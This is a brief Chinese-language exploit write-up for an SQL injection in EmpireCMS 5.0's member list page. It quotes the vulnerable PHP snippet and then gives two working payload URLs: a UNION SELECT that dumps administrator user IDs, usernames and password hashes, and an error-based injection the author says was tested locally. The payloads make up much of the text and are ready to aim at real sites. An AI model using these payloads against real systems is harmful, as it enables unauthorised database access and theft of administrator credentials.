帝国CMS5.0“/e/member/list/index.php”文件注射漏洞
帝国ECMS /e/member/list/index.php文件: ``` if($sear) { $keyboard=RepPostVar2($_GET['keyboard']); if($keyboard) { $add.=$where.$user_username." like '%$keyboard%'"; } $search.="&sear=1&keyboard=$keyboard"; } ``` 判断sear参数是否存在,然后直接去keyboard的参数,然后再判断keyboard值是否为空,如果不为空就直接把keyboard带入查询产生注射漏洞. exp: ``` /e/member/list/index.php?sear=1&totalnum=1&keyboard=%D9'+union+select+1,1,1,concat(char(123),userid,char(95),username,char(95),password,char(125))+from+phome_enewsuser/* ``` mysql 5.5.40,原来exp报错,但是没有内容, 本地成功测试的exp: ``` /e/member/list/index.php?sear=1&totalnum=1&keyboard=%D9' AND (SELECT 7199 FROM(SELECT COUNT(*),CONCAT(0x7e7e7e,(SELECT user()),0x7e7e7e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- cmqD ```
